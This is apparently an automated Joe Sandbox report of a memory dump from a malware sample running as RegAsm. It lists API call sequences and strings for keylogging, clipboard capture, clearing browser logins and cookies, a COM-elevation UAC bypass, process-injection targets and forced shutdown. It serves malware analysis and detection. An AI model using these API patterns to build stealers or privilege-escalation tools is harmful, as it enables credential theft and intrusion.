                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                • API String ID: 1164774033-3681987949
                                                                • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                • String ID: !D@
                                                                • API String ID: 3520204547-604454484
                                                                • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Find$Close$File$FirstNext
                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 3527384056-432212279
                                                                • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                APIs
                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                • String ID:
                                                                • API String ID: 297527592-0
                                                                • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                • API String ID: 3756808967-1743721670
                                                                • Opcode ID: 5b42a80951eb342c4a971769a7958462a684e848444859b94199bc40bd9fc38b
                                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                • Opcode Fuzzy Hash: 5b42a80951eb342c4a971769a7958462a684e848444859b94199bc40bd9fc38b
                                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                • API String ID: 0-1861860590
                                                                • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Object_wcslen
                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                • API String ID: 240030777-3166923314
                                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                • String ID:
                                                                • API String ID: 3587775597-0
                                                                • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                • String ID: JD$JD$JD
                                                                • API String ID: 745075371-3517165026
                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 1164774033-405221262
                                                                • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                • String ID:
                                                                • API String ID: 2341273852-0
                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$CreateFirstNext
                                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                                • API String ID: 341183262-3812160132
                                                                • Opcode ID: 8686161ca2437f15ec34d8a1a2640ae3a169738a9e5f3fbc3809040c5888124a
                                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                • Opcode Fuzzy Hash: 8686161ca2437f15ec34d8a1a2640ae3a169738a9e5f3fbc3809040c5888124a
                                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                • String ID:
                                                                • API String ID: 1888522110-0
                                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                APIs
                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                • API String ID: 2127411465-314212984
                                                                • Opcode ID: 5848efdac69bfd9794d643e9833e62266757dcd20aadc8ba97a8731b3b6f1af5
                                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                • Opcode Fuzzy Hash: 5848efdac69bfd9794d643e9833e62266757dcd20aadc8ba97a8731b3b6f1af5
                                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                APIs
                                                                • _free.LIBCMT ref: 00449292
                                                                • _free.LIBCMT ref: 004492B6
                                                                • _free.LIBCMT ref: 0044943D
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 314583886-0
                                                                • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                APIs
                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                • API String ID: 1589313981-2876530381
                                                                • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                Strings
                                                                • UserProfile, xrefs: 0040BA59
                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                • API String ID: 2018770650-1062637481
                                                                • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
